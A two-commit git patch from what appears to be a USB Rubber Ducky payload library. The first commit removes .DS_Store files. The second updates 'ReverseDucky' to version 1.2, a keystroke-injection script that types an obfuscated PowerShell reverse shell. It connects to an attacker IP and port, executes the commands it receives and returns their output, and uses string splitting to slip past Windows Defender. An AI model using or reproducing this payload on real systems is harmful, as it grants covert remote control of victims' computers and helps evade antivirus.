From 63b19039346afdb229ddb7ae533581d946c2b851 Mon Sep 17 00:00:00 2001 From: Marc Date: Thu, 30 Sep 2021 15:20:46 +0100 Subject: [PATCH 1/2] misc: Remove .DS_Stores, add to git ignore --- .DS_Store | Bin 6148 -> 0 bytes .gitignore | 2 ++ payloads/.DS_Store | Bin 6148 -> 0 bytes payloads/library/.DS_Store | Bin 10244 -> 0 bytes payloads/library/execution/.DS_Store | Bin 6148 -> 0 bytes payloads/library/exfiltration/.DS_Store | Bin 6148 -> 0 bytes payloads/library/general/.DS_Store | Bin 6148 -> 0 bytes payloads/library/mobile/.DS_Store | Bin 6148 -> 0 bytes payloads/library/prank/.DS_Store | Bin 6148 -> 0 bytes payloads/library/recon/.DS_Store | Bin 6148 -> 0 bytes payloads/library/remote_access/.DS_Store | Bin 6148 -> 0 bytes 11 files changed, 2 insertions(+) delete mode 100644 .DS_Store create mode 100644 .gitignore delete mode 100644 payloads/.DS_Store delete mode 100644 payloads/library/.DS_Store delete mode 100644 payloads/library/execution/.DS_Store delete mode 100644 payloads/library/exfiltration/.DS_Store delete mode 100644 payloads/library/general/.DS_Store delete mode 100644 payloads/library/mobile/.DS_Store delete mode 100644 payloads/library/prank/.DS_Store delete mode 100644 payloads/library/recon/.DS_Store delete mode 100644 payloads/library/remote_access/.DS_Store diff --git a/.DS_Store b/.DS_Store deleted file mode 100644 index edc44374060a489365b74ac8c22d2b3027c195da..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 6148 zcmeHK%}yIJ5Vk`AZxJE~BslugTMkM15gdReO%J^xEou*dV3&=^N}F|*-4H^I6E!V3_s_(d76a8PIztSP%B?hQ;jJ{splLVC-kmi=#BF)qe5PTzP(B zQ3$almc^OZQA02Dvq9SQ`zN}0w8}=x;M9@ zyYc;lWtYQ;Xk-O(0*_!678+mGy-U@_kM-!!teCE9wU7+4fAC@Jd;H^Yc3k+XxL)V^ zoWG$|@poN&{Ulb&6^u>RqvJ@30b+m{cq0bzXc0?qRFBFK1H{1lVL+b`5>%s$m|HYQ z2Q=mh09XdM5wP`JLgz?C7csX8BOu(S0@_rLPYiC;!7nk+Ma(VQbjI=V!Et7eFBEQO zhx*clGwxcXmKY!gUNSIeyA^%^fByUX|78;Ohyh~YT`|DREw9ytCE?v#Se(9VCFljH q79E#coTh+bu40JQSMfTi5%5cG0J?~|Meu;o9|1!HHN?O_W#9=p{&dp- diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..5a73fbc --- /dev/null +++ b/.gitignore @@ -0,0 +1,2 @@ +# MacOS +.DS_Store diff --git a/payloads/.DS_Store b/payloads/.DS_Store deleted file mode 100644 index 7f79da04156e9cb0253e26dc005090c03541207d..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 6148 zcmeHKK}#z!5Kd~D)`KU7efSPf(OtLLh3%%aTT88#{RQs_ z=+E)yAMh&gAH09?W|Ams6+DQj%)sQEOlFei%aU{$W4zi8%ZwEmV*(U0=Ros<;5h1t zn*J%auNHjSb=9l?50XmKT7Itog9UA2-*J? zC86q7RW}JcdLGXVIF2Kn!@`fjpj@de7v=KG>aZvWYfGh~tgI~!hmM$AEU#}LHT!3S z^Wnv%A(z8MYHyY7YwOSBsCdA#s-iO!c?w(W!0E|Q}7Xz>W zz{JAj+zeKIF4oUV&ov@iR!|yf58!|YRVYFR+#YS+pc&8%Xa+O`ngPwgzrX;#v)N@% zbE#|1fM!55&}M+`4;B_C<3hH$q^$!hN&!%gVKZHLk9h#uSVG2yY;j4ZI3~{?3}I@B z6vN==*l#g)lyMK40<}+S)>j|oJ(D61~db`46xjN8nRHq+&!n{ z??Eoey0-6ACO<&M&Bsz%zf|VqPCXkuSjkT&ZP&L^!#uM#wfxfkbTLdjw+HQVK}JCv zKm=WRfF%nxI*{#LYnU5}7K57ttlQXCE=>mE*`VtZ|*X{7{EX3>BE92x!)>Z(i3XBfgt zc5{2P9i^cxJJWD)mMR^DbOK7~woTL0vFkxutmw~n*)0auXmrOI866v+m^4ju+MG3S zr3!vMRn1guK_XMR!M?3$ss&rzU%}0#eV?(f7M*%}?#P<&RWn7;sgQ9o=b*~XYeg^T z*AspXmobf#;vJDl#EhipjyD>yrKQDrYjJs{Id3&q7ozjl(&|F988MHZik-i_QQCai zc+`CSn*0Dm{EC1>{Cm58gLjITa(I;vHIT>H&k&_w4%vl|)(%&_4s)X>HeP#B`Fb^S~37N$$5KH@$u lWQ$8OM;$Up$xrkD`kw(h|EGhkyqXlTkm&rMSUC9k{~v^N_jmvR diff --git a/payloads/library/execution/.DS_Store b/payloads/library/execution/.DS_Store deleted file mode 100644 index 72bdb57b45895cbf96a54862988e5716c7505167..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 6148 zcmeHKK}y3w6n&#bi!G=-7cR1JCq;ULsHq4dNUMS?wXIk%B}M7NT~44&ui+iMK@Z@{ zgZTc;*rv3p#f6Cc5A$F0^Zz984KtGgVD|d$DzFBi$R=1=p_^jzT-t;!_{b{J*gh(V z&_@e*s7z#QKow90{+a?Zch|9nV;ta=vvxFp_i>MFJfMRc+_xWEaWhF`PV;%vCMw{I&T+CQy}};t!mMhW!1D5v$MC^ z@x^=dIoh?d{$=IzdHqTCGjO;9u7E4B{|c~YE3y+~_pX2|;0ml1(EmfADd&kh}WS<((g(h^QW zOo!yg?p*;_U{iquI~-{LAOF1n-z@SYSHKn6D+Q!qPRoK*O1*V!a@uPH?UAO?yv}%4 i!a;1s%+*$WMvGuP=zyFj?u;2Bd?65JaOVpAsRCc5!8>{Y diff --git a/payloads/library/general/.DS_Store b/payloads/library/general/.DS_Store deleted file mode 100644 index ea3f13457b648106ba173e38dbe45d6b8f3e7726..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 6148 zcmeHK%}xR_5dMlB2pGdnj(hM0ICx)iO-wv;@TdX{5*L<$M7`}3_)>ERX0t}*x#)@%yk(zg>>Oh};R+F^Xs>vy zK^ag6{u%@F?N)G#8w{!W@Aoe0)tl{fFmhWiyl(a!q*2sL(iS~RjktXLoV=WD^X}~6 zJ-W^BLe44Fc*68C;eK045c9;jSnizCZdjH2f42GlzZj$= zWk4DDR}7e9)QlQT$=BAEf=!1RiPpjXg8A{H<*7003(Y!YV)s0640`;!A8Mi1I7V z$rO#uAu>IOgb2c5*zX2$F4_)Q1}p=QjRAFbXP^!VgwTT<=T`>k`5koQsGn9Uf7n!^ zIQ?RVb3V&o@gH7W4!zV*2mOZM+f=$ry-W%J*4F|;U)Y+UfN0d+qJRD~{KW>8-p*ys`fv53Q3&{nmC$`OPvVP+6L zD9ofHnp8$51~ch6E-20=%nX`zU{riCTA5LW!u0AmztG{pT!Xf?3|IzkGf*(yl6wC? z-(UaVPO?4AfMwuGF~EvVui3yY(c7BaoO){o>Nctp6_***DcI0+tPS-PzeUx8KA{Xm VmoPJkBPjMqK+|9w%fN#&Z~@m6%)I~r diff --git a/payloads/library/prank/.DS_Store b/payloads/library/prank/.DS_Store deleted file mode 100644 index 133badb7c0f71a6f6b1a292aeb650508c4fed468..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 6148 zcmeHK%}T^D5T4N$3JbDFk2!hL!@fbcbj5?7*1OUzD43F>c&|_3L-}HUGZSSOi;EW# zoq^<=OlI=)m1Ytm;_9iL6U~UIKoMk7Mnue`U3=O20LVJVHJwqS2fC-zk%4}rN!ETy z=X6DvbU~ZzudtJjn)Y!Wo0Os~{!7PrJ729+*V``nd6$2e>bi-kfnRZavg}{t>tc6I z`|X(iZgXAopI#B5o062kJ z1-f1_fk6zwGUH$f3xq8cXrY{+7;NFNhwN8o91Ja-SZBsKdFJ=W3+D?i2X!Yd4ZU^- zoPliy_N_US{J+GnH2TQj4)K;V;0*jR26$4h>I$36x%JcbB-aL%8x#@o8$^LX*HjGD kRE&n4BS+e4{Xul}ml+2`8Aa?G4)lwF65^FJ@B<9I0hToVzGUYa4%fQSmXVDA{=2b1&S9qU=<5Xku&6H0VX6S|?tPPHfg zqXP2o&ghn&XolbV`%Cmn5xIuuG;5xxu}&$<7Pcsl^Wk`!7E9gn(bsmYMXIVgrW)17 z$NS0UTl~D*mf8G~xqMiE(hGfHkFJ0#;0o-y0_fRd#i^o4SHKl;1y%~k_aVRqOT$(% ze>xEI2mtIOoegW5C4>_UOT$(XXJD*UpiM{v89cZGJ5}Ht3in21 diff --git a/payloads/library/remote_access/.DS_Store b/payloads/library/remote_access/.DS_Store deleted file mode 100644 index 0dff94cff0848e0c42599966ae0726472f886ad4..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 6148 zcmeHKu};H44E41cf+hVSD8JV5)0_?K;I)_-1IBDQY@7nHkTCGrM>~aWXsnUc$)*MYG0$G0 Date: Thu, 30 Sep 2021 16:39:47 +0200 Subject: [PATCH 2/2] Update ReverseDucky 1.1 to Version 1.2 (#22) Shorten the code to increase the speed --- .../remote_access/ReverseDucky/ReverseDucky.txt | 14 ++++++-------- 1 file changed, 6 insertions(+), 8 deletions(-) diff --git a/payloads/library/remote_access/ReverseDucky/ReverseDucky.txt b/payloads/library/remote_access/ReverseDucky/ReverseDucky.txt index 7492c1d..169d7e9 100644 --- a/payloads/library/remote_access/ReverseDucky/ReverseDucky.txt +++ b/payloads/library/remote_access/ReverseDucky/ReverseDucky.txt @@ -1,9 +1,9 @@ REM ReverseDucky -REM Version 1.1 +REM Version 1.2 REM OS: Windows / Linux(?) (Not tested with Powershell on Linux) REM Author: 0iphor13 -REM Reverse shell executed in the background +REM Reverse shell executed in the background - If blocked by Windows Defender, please contact me. REM Fill in Attacker IP & Port in line 18 REM DON'T FORGET TO START LISTENER @@ -15,14 +15,12 @@ DELAY 250 ENTER DELAY 200 -STRING $I='0.0.0.0';$P=4444;$0LVhbQ= [TyPE]('tExT'+'.enCOD'+'InG') ; $C=.('New'+'-Obj'+'ect') System.Net.Sockets.TCPCl +STRING $I='0.0.0.0';$P=4444;$0LVhbQ=[TyPE]('tExT'+'.enCOD'+'InG');$C=.('New'+'-Obj'+'ect') System.Net.Sockets.TCPClient($ DELAY 200 -STRING ient($I,$P);$S=$C.GetStream();[byte[]]$b=0..65535|&('%'){0};while(($i=$S.Read($b, 0, $b.Length)) -n +STRING I,$P);$S=$C.GetStream();[byte[]]$b=0..65535|&('%'){0};while(($i=$S.Read($b,0,$b.Length))-ne 0){;$d=(&('New'+'-Ob'+'ject' DELAY 200 -STRING e 0){;$d=(&('New'+'-Ob'+'ject') -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb=(&('ie'+'x') $d 2>&1 | . +STRING ) -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$X=(&('ie'+'x') $d 2>&1 | .('Out'+'-St'+'ring'));$Z=$X+'PS'+(& DELAY 200 -STRING ('Out'+'-St'+'ring') );$sb2=$sb+'PS '+(&('pw'+'d')).Path + '> ';$sbt=( $0lvHBq::ASCII).GetBytes($sb2);$S.Write($sbt,0, -DELAY 200 -STRING $sbt.Length);$S.Flush()};$C.Close() +STRING ('pw'+'d')).Path+'>';$sbt=($0lvHBq::ASCII).GetBytes($Z);$S.Write($sbt,0,$sbt.Length);$S.Flush()};$C.Close() DELAY 100 ENTER